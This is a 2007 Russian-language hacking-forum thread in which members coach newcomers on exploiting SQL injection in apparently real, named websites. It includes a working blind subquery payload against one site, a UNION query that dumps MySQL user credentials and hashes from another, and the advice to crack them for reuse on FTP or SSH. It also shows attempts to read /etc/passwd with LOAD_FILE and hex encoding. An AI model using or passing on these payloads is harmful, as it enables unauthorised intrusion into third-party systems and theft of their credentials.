
06.11.2007, 17:54
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
С нами:
9920546
Репутация:
1796
|
|
Хм... никак.... Тут даже посимвольный брут не канает...
__________________
Кто я?..
|
|
|

06.11.2007, 18:30
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от I-I()/Ib
Хм... никак.... Тут даже посимвольный брут не канает...
эх ошибаешься, ой ошибаешься...
здесь можно замутить инъекцию, для этого обязательно должен быть вывод даннных на страницу, а дальше с помощью подзапросов, как говорит I-I()/Ib, с помощью посимвольного брута, но это не всегда возможно
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 06.11.2007 в 18:36..
|
|
|

06.11.2007, 18:05
|
|
Познающий
Регистрация: 25.09.2007
Сообщений: 42
С нами:
9803665
Репутация:
22
|
|
понятно 
|
|
|

06.11.2007, 19:49
|
|
Новичок
Регистрация: 03.11.2007
Сообщений: 1
С нами:
9747474
Репутация:
0
|
|
ребята вот нашол плохую фильтрацию
http://tien.ru/?p=7&GroupID=20'
как дальше разрабатывать sql иньекцию, если можно на примере, заранее благодарен
|
|
|

06.11.2007, 22:27
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от pisylok
ребята вот нашол плохую фильтрацию
http://tien.ru/?p=7&GroupID=20'
как дальше разрабатывать sql иньекцию, если можно на примере, заранее благодарен
плохо то, что это Microsoft Access и здесь нет возможности отбросить (закомментировать) часть запроса, даже %00 в данном случае фильтруется (покрайне мере неработает)
для эксплуатации этой скули можно использовать подзапросы для этого надо подобрать название таблицы и соответственно название поля, вот пример рабочего подзапроса:
Код:
http://tien.ru/?p=7&GroupID=20') and (mid((select top 1 id from news),1,1)<'a
если хочешь что-то получить из этой скули, подбирай имя таблицы с пользователями и соответственно колонки с полезной информацией
__________________
Карфаген должен быть разрушен...
|
|
|

07.11.2007, 13:45
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
это хеши mysql5 использовать ты сможешь их для подключения к БД,
только лучше сделать такой запрос:
Код:
http://www.aphoto.ru/news/news.php?nid=-23+union+select+1,2,concat(host,0x3a,user,0x3a,password),4+from+mysql.user/*
и мы видим что с правами root можно подключится без пароля, но для этого нужен какой нибудь mysql клиент, на этом сервере, например phpMyAdmin
но я советую попробовать их "расшифровать", т.к. иногда пароли от БД подходят и для других сервисов например ftp или ssh
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 07.11.2007 в 13:53..
|
|
|

07.11.2007, 13:51
|
|
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
С нами:
10126406
Репутация:
206
|
|
а со своего компа не получиться подключиться?
я пробовал выполнить команду LOAD_FILE('/etc/passwd') а у меня ошибку пишет, это значить я немогу записывать и читать файлы?
|
|
|

07.11.2007, 14:01
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от SVAROG
а со своего компа не получиться подключиться?
я пробовал выполнить команду LOAD_FILE('/etc/passwd') а у меня ошибку пишет, это значить я немогу записывать и читать файлы?
со своего компа ты не подключишься, LOAD_FILE('/etc/passwd') не прокатывает по двум причинам: 1)фильтрация кавычек (мэйджик квотс включен) 2)даже если закодировать /etc/passwd в hex (LOAD_FILE(0x2F6574632F706173737764)) у тебя нет файловых привелегий и читать и записывать файлы ты не сможешь
__________________
Карфаген должен быть разрушен...
|
|
|

07.11.2007, 17:45
|
|
Banned
Регистрация: 01.08.2006
Сообщений: 725
С нами:
10408706
Репутация:
4451
|
|
Дам-с,на мой вопрос так никто и не ответил...
SELECT * FROM `users` GROUP BY `name` and 1=if(ascii(1)=49,1,(select 1 union select 2 ) )
|
|
|

07.11.2007, 19:22
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от gemaglabin
Дам-с,на мой вопрос так никто и не ответил...
как это не ответил, я в http://forum.antichat.ru/thread51884.html
этом посте помоему понятно описал использование инъекции в order by, а то что я дал линк, а не описание, это потому, что не вижу смысла в двух одинаковых постах на форуме
__________________
Карфаген должен быть разрушен...
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 10 (пользователей: 0 , гостей: 10)
|
|
|
|